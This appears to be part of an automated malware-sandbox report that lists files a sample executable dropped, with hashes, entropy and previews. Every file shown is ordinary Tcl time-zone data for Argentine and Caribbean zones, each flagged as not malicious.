                                                                                                                                                                                                                              Entropy (8bit):3.742645155048276
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5/nuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafww3mC8OS0NC:Vuu3pfe92jCs/VOHv2kdeRtnxafww3mP
                                                                                                                                                                                                                              MD5:3D2AF5714DFC392ED4BC976784D5A58A
                                                                                                                                                                                                                              SHA1:9252DE40B6EF872E1D2F7CDD53DDD21145E93C5C
                                                                                                                                                                                                                              SHA-256:A516BB0937977EF949D47B3C8675E30F1CA6C34F8BD298DCF6EBB943580D5317
                                                                                                                                                                                                                              SHA-512:8D5FFDB5B578B8EA0291D3A21BDDE25F8301CB16B11AE794FFBA8DCFFE46F6AC5EC03D93E511061B132D84E69E5FAF1BB212837EB8A5A4B4BE517F783837E615
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Catamarca) {.. {-9223372036854775808 -15788 0 LMT}.. {-2372096212 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-7522740
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):242
                                                                                                                                                                                                                              Entropy (8bit):4.72138001874583
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MMXAXHAIgp/MMXmRN/290/MquQ90/MMXAy:MByMY/MYp/MrRt290/MquQ90/MK
                                                                                                                                                                                                                              MD5:8A609667DE461CEDC1127BE38B161459
                                                                                                                                                                                                                              SHA1:557D2D55DEA38D1CD1103E183F89C65F4016662B
                                                                                                                                                                                                                              SHA-256:8CCD6FC77D55582938F1912B1BA66035882D1BFC18A797C631E5E89ABFBF570B
                                                                                                                                                                                                                              SHA-512:DBAFDA069DB5FDBCBA11050AC91A733C1712BD6395939CFFFC5EAA78BD0B70B4AF2D9FB8954C6841CCF3AC5F8EDCF08E604D3F2CF67F1CBEA5EB6D3C4DC7F2FA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Catamarca)]} {.. LoadTimeZoneFile America/Argentina/Catamarca..}..set TZData(:America/Argentina/ComodRivadavia) $TZData(:America/Argentina/Catamarca)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2043
                                                                                                                                                                                                                              Entropy (8bit):3.7481312409221594
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5lxQuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafww3mC8OS0n:/xBu3pfe92jCs/VOHv2kdeRtnxafww3j
                                                                                                                                                                                                                              MD5:8C1D665A25E61CE462C2AC57687763BF
                                                                                                                                                                                                                              SHA1:B5BBC26CF6A24BD5BEA42AC485D62C789B80905F
                                                                                                                                                                                                                              SHA-256:FA75E274240A341C6BFE3539CFDC114D125AEAEA3161D3C2409347CF8046042A
                                                                                                                                                                                                                              SHA-512:A89A7A92C025B87DA4CDFE99BF70CD0E64690D7BFE827DCBFBF0E91B188003FA26487E72B6B950D3BFC9C854B890E5936F414BBEAAD5F3F0673AC5EFE273CDF4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Cordoba) {.. {-9223372036854775808 -15408 0 LMT}.. {-2372096592 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2041
                                                                                                                                                                                                                              Entropy (8bit):3.7481290145270245
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5HluuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwcSPAC8OS0E:xwu3pfe92jCs/VOHv2kdeRtnxafwcDCK
                                                                                                                                                                                                                              MD5:995EDE9E1E86DB500C7437A196325E21
                                                                                                                                                                                                                              SHA1:4A8FB1511AA124CA2D299EC8DE155EE9D0479180
                                                                                                                                                                                                                              SHA-256:43EB79ABC03CBAC661C563DE1BC09D9DD855CBC72DD2B6467EA98F0F90421BA9
                                                                                                                                                                                                                              SHA-512:B58B35EA1B2F0388B8108DCF254F3BD1B21894F00A9F313ABC093BC52C36FCDD94B7486DBA38161C9EFCDB12BC3CD81E7E02395B0CA480A7F01148C43CD3054F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Jujuy) {.. {-9223372036854775808 -15672 0 LMT}.. {-2372096328 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000 -
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2106
                                                                                                                                                                                                                              Entropy (8bit):3.744252944523733
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5lduuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwkFC8OS0NC:Tou3pfe92jCs/VOHv2kdeRtnxafwwkFP
                                                                                                                                                                                                                              MD5:4A45A063D45EB94214005EF3CA5BCD6D
                                                                                                                                                                                                                              SHA1:2420E8591DC53A39EE1A58B2E45DCFAF9503685F
                                                                                                                                                                                                                              SHA-256:2B018B791E48269FA9EDA12662FFEC3E2DC33603A918E8B735B8D7D6BEB3B3AA
                                                                                                                                                                                                                              SHA-512:0B2824FA3D40B2EDBE8488D50C30368F4CF6E45A39FF6DEBC5BB4FD86F85AD52F5331AD1EB50E5166FA2E735B7E8AA9D94A5FED9421334DB0499524DBE08F737
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/La_Rioja) {.. {-9223372036854775808 -16044 0 LMT}.. {-2372095956 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-75227400
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2077
                                                                                                                                                                                                                              Entropy (8bit):3.738002814507529
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5CPBuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwGSmSc8OSI:GUu3pfe92jCs/VOHv2kdeRtnxafwGJld
                                                                                                                                                                                                                              MD5:F6CB24E8567B2443224E9E17EE438BFE
                                                                                                                                                                                                                              SHA1:8029426C30C4C645EA77C6240391CDB1C3107568
                                                                                                                                                                                                                              SHA-256:DC39400BBFD5BDDDC174FE099194806FBFD3FC3AA20E670D67BE0AC35FE97AD4
                                                                                                                                                                                                                              SHA-512:6869CFC24C21FBB2DFCCAA9AE7E21A0B24DC002EE792FB28A8F2F05C75C20E93C95A39BD8653AA272AF10FE95922B99EECC1208AACE814817D9441F84360E867
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Mendoza) {.. {-9223372036854775808 -16516 0 LMT}.. {-2372095484 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2080
                                                                                                                                                                                                                              Entropy (8bit):3.7580685839169545
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5oQuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwfFC8OS0NC:qBu3pfe92jCs/VOHv2kdeRtnxafwwfFP
                                                                                                                                                                                                                              MD5:212D13CE27AF114A8EC2E04023D218C4
                                                                                                                                                                                                                              SHA1:C4C5F86BC6EC0D5EA4C9CF199309D085767B97E8
                                                                                                                                                                                                                              SHA-256:A05B6708DEFF0607396BFC6661C2287341C3432841AE353D94A67AC742B5FAFA
                                                                                                                                                                                                                              SHA-512:CE7201EEA6A86FB49641410D2EEE4030EDB1B96F3218D764762F5AE23883C796F5742ED69CEC985A9D3582D6C72ED74114DE81508F6DEB4B54865B6974ADC965
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Rio_Gallegos) {.. {-9223372036854775808 -16612 0 LMT}.. {-2372095388 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-7522
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2011
                                                                                                                                                                                                                              Entropy (8bit):3.7415813345133975
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5NPuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafww3mC8OS0wF:72u3pfe92jCs/VOHv2kdeRtnxafww3mz
                                                                                                                                                                                                                              MD5:A06C33CDFD7E7B630CB1DF34E72E61E5
                                                                                                                                                                                                                              SHA1:694826B9B910DA0BD70A9CB547C26E6838B08111
                                                                                                                                                                                                                              SHA-256:CAEFC60F2F36EF9FFE0C5921C3C392DE1E95755683A96C1C4EC0BA2C242A4D84
                                                                                                                                                                                                                              SHA-512:D6696A6C14EECF2B77EC586F40137BDD95E5CE5C5193570C809FAB9E5FCA4B8744283CEB6818E525C73F6EFF657274410B2622902EE8C15912C8D5F5FA5C805E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Salta) {.. {-9223372036854775808 -15700 0 LMT}.. {-2372096300 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000 -
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2106
                                                                                                                                                                                                                              Entropy (8bit):3.747934819596411
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5vXxuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwkFC8OS0K:hUu3pfe92jCs/VOHv2kdeRtnxafwwkFl
                                                                                                                                                                                                                              MD5:32A50D0ABF408D9E59C0580D5B8CC472
                                                                                                                                                                                                                              SHA1:EA5BB8860982F8BAFEAEFDE1D6ACD440DA132DFE
                                                                                                                                                                                                                              SHA-256:41B2C25E42146A76934B866061BB3245B8ADA0FF4E1BFBA6F8842A30BDD5C132
                                                                                                                                                                                                                              SHA-512:E5D2521A4EF53AAD3E74506708EC2768C4D2EE8D6D014DCCF4A6DC290B713B4D46021B66527548C35004E10D753E1B685EEFD55BBE7BF01EC6104D7D8AAC4403
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/San_Juan) {.. {-9223372036854775808 -16444 0 LMT}.. {-2372095556 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-75227400
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2081
                                                                                                                                                                                                                              Entropy (8bit):3.7399269084699975
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5MDuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafw6bS2nZSbdI:yCu3pfe92jCs/VOHv2kdeRtnxafwWnZr
                                                                                                                                                                                                                              MD5:FB06B66F5D41709C7E85C8B1E9BFCFA0
                                                                                                                                                                                                                              SHA1:D5C0C4B12C6190856C300321B1C106C7474BA54B
                                                                                                                                                                                                                              SHA-256:A43B35F25E54EF359D046E33281C0A978F0EE8811C93A6809F1F65750878BBB6
                                                                                                                                                                                                                              SHA-512:D445F46D6A17A075AD995885E45234A711F53BF3FE2DFC6DFBB611E8AC154B10C91E137927DD66D6A7C596A93BAE5DE283796F341B5095FA0DD05595E1C3A077
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/San_Luis) {.. {-9223372036854775808 -15924 0 LMT}.. {-2372096076 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-75227400
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2105
                                                                                                                                                                                                                              Entropy (8bit):3.741704529449777
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5yZujuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafww3mC8OSf:suiu3pfe92jCs/VOHv2kdeRtnxafww3w
                                                                                                                                                                                                                              MD5:D9497141EC0DC172E5FF5304FED0BE6B
                                                                                                                                                                                                                              SHA1:CD20A4F0C127A84791093010D59DF119DD32340A
                                                                                                                                                                                                                              SHA-256:0F7DB23E1280FC19A1FB716E09A9699ADA2AAE24084CAD472B4C325CC9783CCF
                                                                                                                                                                                                                              SHA-512:0B71952055013CD6045ED209FD98168083550655FAB91B7870C92098E40C4FE6827EAAF922D34ECE28298CBB14327A76AD6780D480E552F52F865AA11A4AA083
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Tucuman) {.. {-9223372036854775808 -15652 0 LMT}.. {-2372096348 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2075
                                                                                                                                                                                                                              Entropy (8bit):3.7445758155279836
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5SHuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwfFC8OS0jE:YOu3pfe92jCs/VOHv2kdeRtnxafwwfFn
                                                                                                                                                                                                                              MD5:16A89FD2CDEE50E534301A9797311A9D
                                                                                                                                                                                                                              SHA1:4A4EBA1798214C7CF5ACDC0B2EC8B4716CD968CB
                                                                                                                                                                                                                              SHA-256:10B6FF51314D8EE1D010187D8805C4E3D71B778BC6DECB26E66193A5BB3E9EA2
                                                                                                                                                                                                                              SHA-512:DBB0BA3F8AA2B54C86EA8B6530C16DF95AF1331FC5F843B113A204DA20B8EF011FE93C27EB917D01B9040D4914057687B4AACCD292A847559AF69150D1BDC4B5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Ushuaia) {.. {-9223372036854775808 -16392 0 LMT}.. {-2372095608 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):199
                                                                                                                                                                                                                              Entropy (8bit):4.893042770292303
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290/V90ppv:MByMYbpwt290/V90b
                                                                                                                                                                                                                              MD5:CC015E3E5D3293CAA1348B4E0EE5795C
                                                                                                                                                                                                                              SHA1:75E7EFD905C9001CE9CA5872DA3915A19BCB00E0
                                                                                                                                                                                                                              SHA-256:7490CD66408B8A14C549278FE67DC3338FE9E458F423F01CCBEA00B5E6F6CEF6
                                                                                                                                                                                                                              SHA-512:66523F050E4A42A1C9FC8C02B822CD3864A6E35F6364FB6A675F2A503BD8030FE6E380B252068668A79A6593B5042520EE40700DA033517742B3F0ED33D79DAF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Aruba) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7944
                                                                                                                                                                                                                              Entropy (8bit):3.5156463862656775
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:j7RXBXLqbvdvZsV4GGdzVUFg7XaMOhKpJq3o5GMJq90vRFhjGF3RxTBhcXBACBLo:jEJgXh
                                                                                                                                                                                                                              MD5:181203CAD98E94355B9914A205514904
                                                                                                                                                                                                                              SHA1:D361CB53955437270905A9432DE9E7F6C1AE7189
                                                                                                                                                                                                                              SHA-256:EAEFE21276EE60C7F876C1D65039999AC069339DCDB82A23FC9206C274510575
                                                                                                                                                                                                                              SHA-512:AE9262DFC35579AEB610DF8BB5F7FBB49232195F55F78402405017681F72C0D2A09FA9EB605B406065A1F44FE6785AC0163870C921DAFFC4746DA6EDA3081521
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
